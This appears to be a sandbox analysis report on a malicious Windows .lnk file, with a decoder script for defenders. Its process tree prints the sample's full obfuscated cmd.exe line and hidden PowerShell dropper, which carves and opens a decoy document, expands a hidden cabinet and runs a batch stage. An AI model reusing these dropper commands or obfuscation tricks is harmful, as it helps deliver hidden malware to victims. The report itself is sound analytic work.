Analysis

  • max time kernel
    118s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64 · arch:x86 · image:win7-20240508-en · locale:en-us · os:windows7-x64 · system
  • submitted
    11/06/2024, 04:49

General

  • Target

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

  • Size

    33.0MB

  • MD5

    cfffb45df8f05d1cb5d9d95fd5a83e9e

  • SHA1

    4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944

  • SHA256

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37

  • SHA512

    5426eb64c10ee748ab2ce0aad3d2b22045c837d6aff3e6da64b9bf9645ea99ca33ab6f7d92de924996eb7879ef65e7bcb607f621bd0483d592a8778e7919a319

  • SSDEEP

    768:vgAPVV/DKgF0JS3EaxNvnIBzHUUYNxHW0onSHzeN6ZC+v1ElH5qwpf2NyDkLmRvN:vtPu35RTnnSHzeNcfSfy6RvN

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with -windowstyle hidden so no console window is shown (see the powershell.exe process below).

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1744
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2860
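The syswow64\cmd.exe command line above hides its real target behind cmd.exe substring expansion: `Set a4qw7afej=etodrpyswhnli` defines a character pool and each `%a4qw7afej:~N,1%` picks one character from it. Resolved, the `call` target is `powershell -windowstyle hidden`, which is exactly the child process at PID 2860. The PowerShell stage then locates any .lnk of length 0x0210CCCC (34,655,436 bytes, matching the 33.0MB target), reads 0xABF6 bytes at offset 0x1A0D as the decoy .hwpx and opens it, reads 0x680 bytes at 0xC603 (which is 0x1A0D + 0xABF6, so the two regions are contiguous) as a .cab, expands it under %ProgramData%\MicrosoftEdge and runs parkonA.bat from it, deleting the .lnk and the .cab afterwards. The two embedded regions total under 52 KB of the 33 MB file. The following Python is an added example for this report, not the sample's code and not sandbox output: it decodes the cmd substring obfuscation with cmd.exe's `%VAR:~start,len%` semantics (including the negative-index forms this sample does not use), pairs the Seek/Read constants from the quoted PowerShell into an offset/size layout, and carves those regions from a container. The function names (`decode_cmd_substrings`, `called_program`, `payload_layout`, `carve`, `build_demo_container`) are mine, and the container bytes are constructed for the demo (a .lnk HeaderSize field, a ZIP magic where the .hwpx sits, a CAB magic where the .cab sits, zeros elsewhere); run it against the real sample's bytes to get the actual .hwpx and .cab.

```python
# Added example: decode the cmd.exe substring obfuscation from the trace and
# carve the payload regions the PowerShell stage reads from the .lnk.
import re

# Obfuscated prefix of the syswow64\cmd.exe command line from the trace
# (the quoted PowerShell body is omitted; it is not needed to decode this part).
CMD_LINE = (
    "/q /c Set a4qw7afej=etodrpyswhnli && call "
    "%a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%"
    "%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%"
    "%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%"
    "%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%"
    "%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%"
    "%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%"
    "%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1%"
)

# The Seek/Read pairs of the PowerShell stage, quoted verbatim from the trace.
PS_STAGE = (
    "$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);"
    "$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;"
    "$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);"
    "$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);"
    "$pyZmuKvG=New-Object byte[] 0x00000680;"
    "$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);"
)

SET_RE = re.compile(r"\bSet\s+(\w+)=([^\s&]+)", re.IGNORECASE)
SUBSTR_RE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")


def decode_cmd_substrings(cmdline: str) -> str:
    """Expand every %VAR:~start[,len]% using the values the line itself Sets.

    Mirrors cmd.exe: a negative start counts back from the end of the value,
    a negative len drops that many trailing characters, no len means to end.
    Variable names are case-insensitive, as in cmd.exe.
    """
    env = {m.group(1).lower(): m.group(2) for m in SET_RE.finditer(cmdline)}

    def expand(m):
        value = env.get(m.group(1).lower())
        if value is None:  # variable never Set on this line: leave untouched
            return m.group(0)
        start = int(m.group(2))
        if start < 0:
            start = max(len(value) + start, 0)
        if m.group(3) is None:
            return value[start:]
        length = int(m.group(3))
        end = len(value) + length if length < 0 else start + length
        return value[start:end]

    return SUBSTR_RE.sub(expand, cmdline)


def called_program(cmdline: str) -> str:
    """Return what the decoded line actually hands to `call`."""
    return decode_cmd_substrings(cmdline).split("call ", 1)[1].strip()


SEEK_RE = re.compile(r"\.Seek\((0x[0-9A-Fa-f]+)")
READ_RE = re.compile(r"\.Read\(\$\w+,\s*0,\s*(0x[0-9A-Fa-f]+)\)")


def payload_layout(ps_script: str):
    """Pair each FileStream.Seek offset with the Read length that follows it."""
    offsets = [int(h, 16) for h in SEEK_RE.findall(ps_script)]
    sizes = [int(h, 16) for h in READ_RE.findall(ps_script)]
    if len(offsets) != len(sizes):
        raise ValueError("unbalanced Seek/Read pairs in script")
    return list(zip(offsets, sizes))


def carve(container: bytes, layout):
    """Slice each (offset, size) region out of the container; refuse short reads."""
    chunks = []
    for offset, size in layout:
        chunk = container[offset:offset + size]
        if len(chunk) != size:
            raise ValueError(f"container too small for region at {offset:#x}")
        chunks.append(chunk)
    return chunks


def build_demo_container() -> bytes:
    """Constructed stand-in for the 33 MB .lnk (demo data, not the sample):
    a ShellLink HeaderSize field, a ZIP magic at the .hwpx offset (HWPX is a
    ZIP container), a CAB magic at the .cab offset, zero padding elsewhere."""
    layout = payload_layout(PS_STAGE)
    end = max(off + size for off, size in layout)
    buf = bytearray(end + 16)
    buf[0:4] = (0x4C).to_bytes(4, "little")           # .lnk HeaderSize
    buf[layout[0][0]:layout[0][0] + 4] = b"PK\x03\x04"  # decoy .hwpx (ZIP)
    buf[layout[1][0]:layout[1][0] + 4] = b"MSCF"        # Microsoft Cabinet
    return bytes(buf)


if __name__ == "__main__":
    print(called_program(CMD_LINE))
    layout = payload_layout(PS_STAGE)
    for (off, size), blob in zip(layout, carve(build_demo_container(), layout)):
        print(f"offset {off:#07x} size {size:#06x} magic {blob[:4]!r}")
```

To carve the real sample, replace `build_demo_container()` with `open(path, "rb").read()` on a file whose length is 0x0210CCCC; the two chunks are the .hwpx decoy and the .cab, and `expand.exe` (or any CAB extractor) on the second yields parkonA.bat, the next stage this report does not capture.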

Network
